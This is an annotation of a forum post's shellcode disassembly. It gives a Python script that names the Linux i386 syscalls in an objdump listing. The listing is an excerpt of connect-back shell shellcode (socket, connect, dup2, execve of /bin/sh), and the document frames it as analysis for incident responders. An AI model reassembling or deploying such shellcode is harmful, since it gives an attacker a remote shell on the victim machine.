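Dave Korn's post (Message 7) leaves the shellcode disassembly uncommented and points the reader at the values in eax before each int $0x80. As an added example that is not code from his post, this annotator tracks the immediates moved into %al, %bl and %cl before every int $0x80 and names the Linux/i386 syscall (numbers from asm/unistd.h); the LISTING is a constructed excerpt of the posted objdump output, keeping only the syscall-feeding lines, and the helper names are mine.

```python
# Added example (not from the post): name the syscalls in an objdump -D listing.
import re
import struct

# Linux/i386 syscall numbers this payload uses (asm/unistd.h); socketcall() sub-calls come from %ebx.
SYSCALLS = {0x01: "exit", 0x0b: "execve", 0x3f: "dup2", 0x66: "socketcall"}
SOCKETCALLS = {1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept"}

# Constructed excerpt of the posted listing: only the instructions that feed a syscall are kept.
LISTING = """\
1b: b3 01 mov $0x1,%bl
1d: b0 66 mov $0x66,%al
1f: cd 80 int $0x80
3f: b3 03 mov $0x3,%bl
41: b0 66 mov $0x66,%al
43: cd 80 int $0x80
45: 31 c9 xor %ecx,%ecx
53: b0 3f mov $0x3f,%al
55: 89 d3 mov %edx,%ebx
57: cd 80 int $0x80
72: 68 6e 2f 73 68 push $0x68732f6e
77: 68 2f 2f 62 69 push $0x69622f2f
82: b0 0b mov $0xb,%al
84: cd 80 int $0x80
"""

LINE = re.compile(r"^\s*([0-9a-f]+):\s+(?:[0-9a-f]{2}\s)+\s*(\S+)(?:\s+(\S+))?$")
IMM_TO_REG = re.compile(r"^\$0x([0-9a-f]+),%(al|bl|cl)$")
PUSH_IMM = re.compile(r"^\$0x[0-9a-f]{8}$")
ZEROED = {"%eax,%eax": "al", "%ebx,%ebx": "bl", "%ecx,%ecx": "cl"}


def stack_string(pushed):
    """Rebuild the string the pushes laid out in memory (last push = lowest address)."""
    data = b"".join(struct.pack("<I", v) for v in reversed(pushed))
    return data.split(b"\0", 1)[0].decode("ascii", "replace")


def describe(regs, pushed):
    """Name the syscall selected by %al, plus whatever argument detail was tracked."""
    name = SYSCALLS.get(regs["al"], "syscall_%s" % regs["al"])
    if name == "socketcall":
        return "socketcall:%s" % SOCKETCALLS.get(regs["bl"], "sub_%s" % regs["bl"])
    if name == "dup2":
        return "dup2(%s, %s)" % (regs["bl"], regs["cl"])
    if name == "execve":
        return 'execve("%s")' % stack_string(pushed)
    return name


def annotate(listing):
    """Return [(offset, description)] for every int $0x80 in an objdump -D listing."""
    regs, pushed, calls = {"al": None, "bl": None, "cl": None}, [], []
    for m in filter(None, map(LINE.match, listing.splitlines())):
        off, mnem, ops = int(m.group(1), 16), m.group(2), m.group(3) or ""
        if mnem == "xor" and ops in ZEROED:
            regs[ZEROED[ops]] = 0            # xor reg,reg is the NUL-free way to zero
        elif mnem == "mov" and (imm := IMM_TO_REG.match(ops)):
            regs[imm.group(2)] = int(imm.group(1), 16)
        elif mnem == "mov" and ops == "%edx,%ebx":
            regs["bl"] = "fd"                # %edx holds the fd saved right after socket()
        elif mnem == "push" and PUSH_IMM.match(ops):
            pushed.append(int(ops[3:], 16))  # 32-bit immediates build strings on the stack
        elif mnem == "int" and ops == "$0x80":
            calls.append((off, describe(regs, pushed)))
            pushed = []
    return calls
```

Run over the excerpt it reports socket, connect, dup2 of the socket onto fd 0 and execve of "//bin/sh", which is the picture an incident responder needs from this payload before looking at anything else.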
